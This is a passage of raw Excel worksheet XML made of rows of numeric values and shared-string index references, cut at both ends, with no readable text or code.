        <v>562</v>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="101">
        <v>29424.0</v>
      </c>
      <c r="B74" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C74" s="125" t="s">
        <v>565</v>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="106">
        <v>29439.0</v>
      </c>
      <c r="B75" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C75" s="126" t="s">
        <v>568</v>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="101">
        <v>29594.0</v>
      </c>
      <c r="B76" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C76" s="125" t="s">
        <v>571</v>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="106">
        <v>30161.0</v>
      </c>
      <c r="B77" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C77" s="126" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="101">
        <v>30432.0</v>
      </c>
      <c r="B78" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C78" s="125" t="s">
        <v>583</v>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="106">
        <v>30950.0</v>
      </c>
      <c r="B79" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C79" s="126" t="s">
        <v>592</v>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="101">
        <v>31015.0</v>
      </c>
      <c r="B80" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C80" s="125" t="s">
        <v>595</v>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="106">
        <v>31369.0</v>
      </c>
      <c r="B81" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C81" s="126" t="s">
        <v>598</v>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="101">
        <v>31677.0</v>
      </c>
      <c r="B82" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C82" s="125" t="s">
        <v>601</v>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="106">
        <v>32072.0</v>
      </c>
      <c r="B83" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C83" s="126" t="s">
        <v>604</v>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="101">
        <v>32096.0</v>
      </c>
      <c r="B84" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C84" s="125" t="s">
        <v>607</v>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="106">
        <v>32111.0</v>
      </c>
      <c r="B85" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C85" s="126" t="s">
        <v>610</v>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="101">
        <v>32145.0</v>
      </c>
      <c r="B86" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C86" s="125" t="s">
        <v>613</v>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="106">
        <v>33689.0</v>
      </c>
      <c r="B87" s="107" t="s">
        <v>24</v>
      </c>
      <c r="C87" s="126" t="s">
        <v>616</v>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="101">
        <v>33949.0</v>
      </c>
      <c r="B88" s="102" t="s">
        <v>24</v>
      </c>
      <c r="C88" s="125" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="106">
        <v>2826.0</v>
      </c>
      <c r="B89" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C89" s="126" t="s">
        <v>622</v>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="101">
        <v>2962.0</v>
      </c>
      <c r="B90" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C90" s="125" t="s">
        <v>625</v>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="106">
        <v>3032.0</v>
      </c>
      <c r="B91" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C91" s="126" t="s">
        <v>628</v>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="101">
        <v>3090.0</v>
      </c>
      <c r="B92" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C92" s="125" t="s">
        <v>631</v>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="106">
        <v>3110.0</v>
      </c>
      <c r="B93" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C93" s="126" t="s">
        <v>634</v>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="101">
        <v>3130.0</v>
      </c>
      <c r="B94" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C94" s="125" t="s">
        <v>640</v>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="106">
        <v>3184.0</v>
      </c>
      <c r="B95" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C95" s="126" t="s">
        <v>643</v>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="101">
        <v>3185.0</v>
      </c>
      <c r="B96" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C96" s="125" t="s">
        <v>646</v>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="106">
        <v>3207.0</v>
      </c>
      <c r="B97" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C97" s="126" t="s">
        <v>649</v>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="101">
        <v>7946.0</v>
      </c>
      <c r="B98" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C98" s="125" t="s">
        <v>666</v>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="106">
        <v>7992.0</v>
      </c>
      <c r="B99" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C99" s="126" t="s">
        <v>669</v>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="101">
        <v>8023.0</v>
      </c>
      <c r="B100" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C100" s="125" t="s">
        <v>672</v>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="106">
        <v>8494.0</v>
      </c>
      <c r="B101" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C101" s="126" t="s">
        <v>678</v>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="101">
        <v>8732.0</v>
      </c>
      <c r="B102" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C102" s="125" t="s">
        <v>681</v>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="106">
        <v>8765.0</v>
      </c>
      <c r="B103" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C103" s="126" t="s">
        <v>684</v>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="101">
        <v>8792.0</v>
      </c>
      <c r="B104" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C104" s="125" t="s">
        <v>687</v>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="106">
        <v>8888.0</v>
      </c>
      <c r="B105" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C105" s="126" t="s">
        <v>690</v>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="101">
        <v>9667.0</v>
      </c>
      <c r="B106" s="102" t="s">
        <v>27</v>
      </c>
      <c r="C106" s="125" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="106">
        <v>10053.0</v>
      </c>
      <c r="B107" s="107" t="s">
        <v>27</v>
      </c>
      <c r="C107" s="126" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="101">
        <v>36.0</v>
      </c>
      <c r="B108" s="102" t="s">
        <v>33</v>
      </c>
      <c r="C108" s="125" t="s">
        <v>898</v>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="106">
        <v>45.0</v>
      </c>
      <c r="B109" s="107" t="s">
        <v>33</v>
      </c>
      <c r="C109" s="126" t="s">
        <v>901</v>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="101">
        <v>52.0</v>
      </c>
      <c r="B110" s="102" t="s">
        <v>33</v>
      </c>
      <c r="C110" s="125" t="s">
        <v>904</v>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="106">
        <v>60.0</v>
      </c>
      <c r="B111" s="107" t="s">
        <v>33</v>
      </c>
      <c r="C111" s="126" t="s">
        <v>907</v>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="101">
        <v>153.0</v>
      </c>
      <c r="B112" s="102" t="s">
        <v>33</v>
      </c>
      <c r="C112" s="125" t="s">
        <v>913</v>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="106">
        <v>178.0</v>
      </c>
      <c r="B113" s="107" t="s">
        <v>33</v>
      </c>
      <c r="C113" s="126" t="s">
        <v>918</v>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="101">
        <v>182.0</v>
      </c>
      <c r="B114" s="102" t="s">
        <v>33</v>
      </c>
      <c r="C114" s="125" t="s">
        <v>921</v>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="106">
        <v>183.0</v>
      </c>
      <c r="B115" s="107" t="s">
        <v>33</v>
      </c>
      <c r="C115" s="126" t="s">
        <v>924</v>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="101">
        <v>133.0</v>
      </c>
      <c r="B116" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C116" s="125" t="s">
        <v>929</v>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="106">
        <v>268.0</v>
      </c>
      <c r="B117" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C117" s="126" t="s">
        <v>935</v>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="101">
        <v>280.0</v>
      </c>
      <c r="B118" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C118" s="125" t="s">
        <v>938</v>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="106">
        <v>456.0</v>
      </c>
      <c r="B119" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C119" s="126" t="s">
        <v>941</v>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="101">
        <v>510.0</v>
      </c>
      <c r="B120" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C120" s="125" t="s">
        <v>946</v>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="106">
        <v>575.0</v>
      </c>
      <c r="B121" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C121" s="126" t="s">
        <v>949</v>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="101">
        <v>1300.0</v>
      </c>
      <c r="B122" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C122" s="125" t="s">
        <v>958</v>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="106">
        <v>1437.0</v>
      </c>
      <c r="B123" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C123" s="126" t="s">
        <v>961</v>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="101">
        <v>1479.0</v>
      </c>
      <c r="B124" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C124" s="125" t="s">
        <v>964</v>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="106">
        <v>1511.0</v>
      </c>
      <c r="B125" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C125" s="126" t="s">
        <v>967</v>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="101">
        <v>1532.0</v>
      </c>
      <c r="B126" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C126" s="125" t="s">
        <v>970</v>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="106">
        <v>1626.0</v>
      </c>
      <c r="B127" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C127" s="126" t="s">
        <v>973</v>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="101">
        <v>1638.0</v>
      </c>
      <c r="B128" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C128" s="125" t="s">
        <v>976</v>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="106">
        <v>1878.0</v>
      </c>
      <c r="B129" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C129" s="126" t="s">
        <v>979</v>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="101">
        <v>1915.0</v>
      </c>
      <c r="B130" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C130" s="125" t="s">
        <v>982</v>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="106">
        <v>1939.0</v>
      </c>
      <c r="B131" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C131" s="126" t="s">
        <v>985</v>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="101">
        <v>2584.0</v>
      </c>
      <c r="B132" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C132" s="125" t="s">
        <v>994</v>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="106">
        <v>3003.0</v>
      </c>
      <c r="B133" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C133" s="126" t="s">
        <v>997</v>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="101">
        <v>3536.0</v>
      </c>
      <c r="B134" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C134" s="125" t="s">
        <v>1006</v>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="106">
        <v>3827.0</v>
      </c>
      <c r="B135" s="107" t="s">
        <v>35</v>
      </c>
      <c r="C135" s="126" t="s">
        <v>1012</v>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="101">
        <v>3856.0</v>
      </c>
      <c r="B136" s="102" t="s">
        <v>35</v>
      </c>
      <c r="C136" s="125" t="s">
        <v>1015</v>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="106">
        <v>14508.0</v>
      </c>
      <c r="B137" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C137" s="126" t="s">
        <v>1018</v>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="101">
        <v>14980.0</v>
      </c>
      <c r="B138" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C138" s="125" t="s">
        <v>1022</v>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="106">
        <v>14983.0</v>
      </c>
      <c r="B139" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C139" s="126" t="s">
        <v>1028</v>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="101">
        <v>15007.0</v>
      </c>
      <c r="B140" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C140" s="125" t="s">
        <v>1031</v>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="106">
        <v>15252.0</v>
      </c>
      <c r="B141" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C141" s="126" t="s">
        <v>1034</v>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="101">
        <v>15291.0</v>
      </c>
      <c r="B142" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C142" s="125" t="s">
        <v>1037</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="106">
        <v>15608.0</v>
      </c>
      <c r="B143" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C143" s="126" t="s">
        <v>1049</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="101">
        <v>15931.0</v>
      </c>
      <c r="B144" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C144" s="125" t="s">
        <v>1052</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="106">
        <v>16048.0</v>
      </c>
      <c r="B145" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C145" s="126" t="s">
        <v>1056</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="101">
        <v>16748.0</v>
      </c>
      <c r="B146" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C146" s="125" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="106">
        <v>20133.0</v>
      </c>
      <c r="B147" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C147" s="126" t="s">
        <v>1062</v>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="101">
        <v>20445.0</v>
      </c>
      <c r="B148" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C148" s="125" t="s">
        <v>1065</v>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="106">
        <v>20634.0</v>
      </c>
      <c r="B149" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C149" s="126" t="s">
        <v>1068</v>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="101">
        <v>21123.0</v>
      </c>
      <c r="B150" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C150" s="125" t="s">
        <v>1071</v>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="106">
        <v>22023.0</v>
      </c>
      <c r="B151" s="107" t="s">
        <v>37</v>
      </c>
      <c r="C151" s="126" t="s">
        <v>1074</v>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="101">
        <v>22328.0</v>
      </c>
      <c r="B152" s="102" t="s">
        <v>37</v>
      </c>
      <c r="C152" s="125" t="s">
        <v>1077</v>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="106">
        <v>443.0</v>
      </c>
      <c r="B153" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C153" s="126" t="s">
        <v>1113</v>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="101">
        <v>474.0</v>
      </c>
      <c r="B154" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C154" s="125" t="s">
        <v>1116</v>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="106">
        <v>481.0</v>
      </c>
      <c r="B155" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C155" s="126" t="s">
        <v>1122</v>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="101">
        <v>495.0</v>
      </c>
      <c r="B156" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C156" s="125" t="s">
        <v>1125</v>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="106">
        <v>512.0</v>
      </c>
      <c r="B157" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C157" s="126" t="s">
        <v>1128</v>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="101">
        <v>525.0</v>
      </c>
      <c r="B158" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C158" s="125" t="s">
        <v>1131</v>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="106">
        <v>557.0</v>
      </c>
      <c r="B159" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C159" s="126" t="s">
        <v>1134</v>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="101">
        <v>637.0</v>
      </c>
      <c r="B160" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C160" s="125" t="s">
        <v>1137</v>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="106">
        <v>652.0</v>
      </c>
      <c r="B161" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C161" s="126" t="s">
        <v>1143</v>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="101">
        <v>660.0</v>
      </c>
      <c r="B162" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C162" s="125" t="s">
        <v>1146</v>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="106">
        <v>738.0</v>
      </c>
      <c r="B163" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C163" s="126" t="s">
        <v>1149</v>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="101">
        <v>779.0</v>
      </c>
      <c r="B164" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C164" s="125" t="s">
        <v>1152</v>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="106">
        <v>914.0</v>
      </c>
      <c r="B165" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C165" s="126" t="s">
        <v>1158</v>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="101">
        <v>942.0</v>
      </c>
      <c r="B166" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C166" s="125" t="s">
        <v>1164</v>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="106">
        <v>983.0</v>
      </c>
      <c r="B167" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C167" s="126" t="s">
        <v>1170</v>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="101">
        <v>1005.0</v>
      </c>
      <c r="B168" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C168" s="125" t="s">
        <v>1176</v>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="106">
        <v>1022.0</v>
      </c>
      <c r="B169" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C169" s="126" t="s">
        <v>1179</v>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="101">
        <v>1086.0</v>
      </c>
      <c r="B170" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C170" s="125" t="s">
        <v>1182</v>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="106">
        <v>1173.0</v>
      </c>
      <c r="B171" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C171" s="126" t="s">
        <v>1185</v>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="101">
        <v>1198.0</v>
      </c>
      <c r="B172" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C172" s="125" t="s">
        <v>1197</v>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="106">
        <v>1280.0</v>
      </c>
      <c r="B173" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C173" s="126" t="s">
        <v>1203</v>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="101">
        <v>1701.0</v>
      </c>
      <c r="B174" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C174" s="125" t="s">
        <v>1206</v>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="106">
        <v>1775.0</v>
      </c>
      <c r="B175" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C175" s="126" t="s">
        <v>1209</v>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="101">
        <v>2010.0</v>
      </c>
      <c r="B176" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C176" s="125" t="s">
        <v>1212</v>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="106">
        <v>2154.0</v>
      </c>
      <c r="B177" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C177" s="126" t="s">
        <v>1218</v>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="101">
        <v>2251.0</v>
      </c>
      <c r="B178" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C178" s="125" t="s">
        <v>1224</v>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="106">
        <v>2524.0</v>
      </c>
      <c r="B179" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C179" s="126" t="s">
        <v>1230</v>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="101">
        <v>2525.0</v>
      </c>
      <c r="B180" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C180" s="125" t="s">
        <v>1234</v>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="106">
        <v>2538.0</v>
      </c>
      <c r="B181" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C181" s="126" t="s">
        <v>1236</v>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="101">
        <v>2643.0</v>
      </c>
      <c r="B182" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C182" s="125" t="s">
        <v>1243</v>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="106">
        <v>2650.0</v>
      </c>
      <c r="B183" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C183" s="126" t="s">
        <v>1246</v>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="101">
        <v>2710.0</v>
      </c>
      <c r="B184" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C184" s="125" t="s">
        <v>1249</v>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="106">
        <v>2943.0</v>
      </c>
      <c r="B185" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C185" s="126" t="s">
        <v>1261</v>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="101">
        <v>3274.0</v>
      </c>
      <c r="B186" s="102" t="s">
        <v>41</v>
      </c>
      <c r="C186" s="125" t="s">
        <v>1271</v>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="106">
        <v>3420.0</v>
      </c>
      <c r="B187" s="107" t="s">
        <v>41</v>
      </c>
      <c r="C187" s="126" t="s">
        <v>1281</v>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="101">
        <v>27288.0</v>
      </c>
      <c r="B188" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C188" s="125" t="s">
        <v>1339</v>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="106">
        <v>27305.0</v>
      </c>
      <c r="B189" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C189" s="126" t="s">
        <v>1342</v>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="101">
        <v>28003.0</v>
      </c>
      <c r="B190" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C190" s="125" t="s">
        <v>1345</v>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="106">
        <v>28233.0</v>
      </c>
      <c r="B191" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C191" s="126" t="s">
        <v>1348</v>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="101">
        <v>28381.0</v>
      </c>
      <c r="B192" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C192" s="125" t="s">
        <v>1354</v>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="106">
        <v>28539.0</v>
      </c>
      <c r="B193" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C193" s="126" t="s">
        <v>1360</v>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="101">
        <v>29071.0</v>
      </c>
      <c r="B194" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C194" s="125" t="s">
        <v>1363</v>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="106">
        <v>29127.0</v>
      </c>
      <c r="B195" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C195" s="126" t="s">
        <v>1366</v>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="101">
        <v>30039.0</v>
      </c>
      <c r="B196" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C196" s="125" t="s">
        <v>1369</v>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="106">
        <v>30103.0</v>
      </c>
      <c r="B197" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C197" s="126" t="s">
        <v>1372</v>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="101">
        <v>30860.0</v>
      </c>
      <c r="B198" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C198" s="125" t="s">
        <v>1381</v>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="106">
        <v>31091.0</v>
      </c>
      <c r="B199" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C199" s="126" t="s">
        <v>1384</v>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="101">
        <v>32540.0</v>
      </c>
      <c r="B200" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C200" s="125" t="s">
        <v>1387</v>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="106">
        <v>33109.0</v>
      </c>
      <c r="B201" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C201" s="126" t="s">
        <v>1390</v>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="101">
        <v>33357.0</v>
      </c>
      <c r="B202" s="102" t="s">
        <v>57</v>
      </c>
      <c r="C202" s="125" t="s">
        <v>1393</v>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="106">
        <v>33742.0</v>
      </c>
      <c r="B203" s="107" t="s">
        <v>57</v>
      </c>
      <c r="C203" s="126" t="s">
        <v>1396</v>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="101">
        <v>18363.0</v>
      </c>
      <c r="B204" s="102" t="s">
        <v>67</v>
      </c>
      <c r="C204" s="125" t="s">
        <v>1432</v>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="106">
        <v>18368.0</v>
      </c>
      <c r="B205" s="107" t="s">
        <v>67</v>
      </c>
      <c r="C205" s="126" t="s">
        <v>1435</v>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="101">
        <v>18447.0</v>
      </c>
      <c r="B206" s="102" t="s">
        <v>67</v>
      </c>
      <c r="C206" s="125" t="s">
        <v>1441</v>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="106">
        <v>18585.0</v>
      </c>
      <c r="B207" s="107" t="s">
        <v>67</v>
      </c>
      <c r="C207" s="126" t="s">
        <v>1446</v>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="101">
        <v>18669.0</v>
      </c>
      <c r="B208" s="102" t="s">
        <v>67</v>
      </c>
      <c r="C208" s="125" t="s">
        <v>1452</v>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="106">
        <v>18845.0</v>
      </c>
      <c r="B209" s="107" t="s">
        <v>67</v>
      </c>
      <c r="C209" s="126" t="s">
        <v>1464</v>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="101">
        <v>18872.0</v>
      </c>
      <c r="B210" s="102" t="s">
        <v>67</v>
      </c>
      <c r="C210" s="125" t="s">
        <v>1467</v>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="106">
        <v>18887.0</v>
      </c>
      <c r="B211" s="107" t="s">
        <v>67</v>
      </c>
      <c r="C211" s="126" t="s">
        <v>1473</v>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="101">
        <v>18991.0</v>
      </c>
      <c r="B212" s="102" t="s">
        <v>67</v>
      </c>
      <c r="C212" s="125" t="s">
        <v>1479</v>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="106">
        <v>11.0</v>
      </c>
      <c r="B213" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C213" s="126" t="s">
        <v>1503</v>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="101">
        <v>24.0</v>
      </c>
      <c r="B214" s="102" t="s">
        <v>69</v>
      </c>
      <c r="C214" s="125" t="s">
        <v>1509</v>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="106">
        <v>33.0</v>
      </c>
      <c r="B215" s="107" t="s">
        <v>69</v>
      </c>
      <c r="C215" s="126" t="s">
        <v>1512</v>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="101">
